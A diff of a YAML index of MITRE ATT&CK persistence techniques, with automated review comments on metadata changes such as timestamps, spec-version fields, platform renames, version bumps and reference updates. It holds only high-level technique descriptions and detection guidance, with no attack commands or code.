- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
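Review bot: T1037.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` here with nothing added in their place, whereas every other technique in this patch that drops `x_mitre_attack_spec_version` gets `x_mitre_attack_spec_version: 3.2.0` back in the same object; combined with its `modified` moving back by more than a year in the preceding hunk (2021-04-29 to 2020-03-24), confirm this object was regenerated from the same upstream snapshot as the rest.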
@@ -34253,12 +34653,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34343,7 +34742,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -34408,18 +34806,17 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34452,10 +34849,9 @@ persistence:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
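Review bot: the platform change for T1556.009 is not a one-to-one rename: `Azure AD` and `SaaS` are both removed and only `Identity Provider` is added (version 1.0 to 1.1), so the technique no longer lists SaaS at all. Confirm that matches the upstream record and that any SaaS-keyed index is regenerated accordingly.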
@@ -34492,7 +34888,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.001:
technique:
@@ -34566,7 +34961,7 @@ persistence:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34594,12 +34989,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1505:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T21:18:29.349Z'
name: Server Software Component
description: 'Adversaries may abuse legitimate extensible development features
of servers to establish persistent access to systems. Enterprise server applications
@@ -34658,33 +35052,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -34705,6 +35076,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -34719,52 +35091,42 @@ persistence:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
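Review bot: this hunk interleaves the tail of T1556.001 with the head of T1556.005 around the shared `type: attack-pattern` context line, which makes the line-level diff misleading; review it object by object. The substantive changes are that T1556.001 drops `x_mitre_permissions_required` (`Administrator`) and bumps `x_mitre_version` 2.0 to 2.1, and T1556.005's `modified` moves forward to 2024-08-26; the reference block deleted from T1556.005 here is restored further down under its `external_references`.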
@@ -34786,6 +35148,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -34796,23 +35159,50 @@ persistence:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -34829,7 +35219,7 @@ persistence:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
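Review bot: the contributor rename from `Alexander Rodchenko` to `Rodchenko Aleksandr` puts the surname first, unlike the other entry in the same list (`Brandon Dalton @PartyD0lphin`); since contributor strings are copied from upstream STIX they should be left as the source has them, but confirm this is what upstream emits rather than a local edit.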
@@ -34888,7 +35278,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -34970,7 +35359,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1543.002:
@@ -35085,12 +35473,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1136:
technique:
- modified: '2024-01-31T20:46:43.215Z'
+ modified: '2024-10-15T15:53:21.895Z'
name: Create Account
description: |-
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -35113,16 +35500,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- Network
- Containers
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -35149,7 +35535,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.013:
technique:
@@ -35218,7 +35603,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.007:
technique:
@@ -35254,7 +35638,7 @@ persistence:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -35273,12 +35657,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35328,12 +35711,11 @@ persistence:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35366,9 +35748,10 @@ persistence:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
@@ -35385,9 +35768,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
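Review bot: T1098.002 loses `Google Workspace` outright and gains only `Office Suite`, whereas the first hunk in this section and T1078.004 below replace `Google Workspace` with `Office Suite` plus `Identity Provider`. That confirms the platform change cannot be applied as a rename: the Google Workspace index must be rebuilt from the new platform lists, and a technique that no longer lists Google Workspace should not remain in that index.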
@@ -35433,7 +35815,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests:
- name: EXO - Full access mailbox permission granted to a user
@@ -35489,7 +35870,7 @@ persistence:
elevation_required: false
T1653:
technique:
- modified: '2023-09-30T21:28:45.038Z'
+ modified: '2024-10-16T20:11:40.334Z'
name: Power Settings
description: |-
Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35503,7 +35884,7 @@ persistence:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Juan Tapiador
x_mitre_deprecated: false
x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35562,7 +35943,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.001:
technique:
@@ -35588,7 +35968,7 @@ persistence:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -35614,13 +35994,11 @@ persistence:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1137.002:
technique:
- modified: '2024-04-16T12:41:55.175Z'
+ modified: '2024-10-15T16:01:48.325Z'
name: 'Office Application Startup: Office Test'
description: |-
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
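Review bot: for T1037.001 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed with nothing added, while other objects in this diff either keep `x_mitre_attack_spec_version` or bump it (T1078.003 goes 3.1.0 to 3.2.0). Together with its `modified` rolling back from 2021-04-29 to 2020-03-24, this object looks like it was rendered from an older copy than its neighbours; T1556.004 and T1574.012 later in the file show the same pattern. Worth checking that the generator reads every object from the same bundle before merging.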
@@ -35644,8 +36022,8 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'Command: Command Execution'
@@ -35675,7 +36053,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1137.002
atomic_tests: []
T1547.008:
@@ -35718,7 +36095,7 @@ persistence:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -35743,12 +36120,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -35788,8 +36164,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -35797,13 +36175,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -35834,17 +36212,14 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
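Review bot: the only content change in this hunk is the new sentence on scheduling `at` jobs through the `Win32_ScheduledJob` WMI class; the removal of `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` just above `identifier: T1078.004` is a key reorder (both are re-added earlier in the T1078.004 object), not a loss, so no action needed there. The new sentence cites `(Citation: Malicious Life by Cybereason)`, whose `source_name` entry is added in a later hunk; the two must stay in sync if either is edited.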
@@ -35907,7 +36282,7 @@ persistence:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -35941,8 +36316,8 @@ persistence:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -35951,6 +36326,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
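Review bot: the new reference URL carries the fragment `#blog-subscribe`, which looks like a subscribe-widget anchor rather than part of the article locator; strip it so the entry points at `https://www.cybereason.com/blog/wmi-lateral-movement-win32`. The entry also records `(n.d.)` for a dated blog post; if upstream ATT&CK has it that way, mirroring it is acceptable, but it is worth a look before merging.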
@@ -35963,12 +36342,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
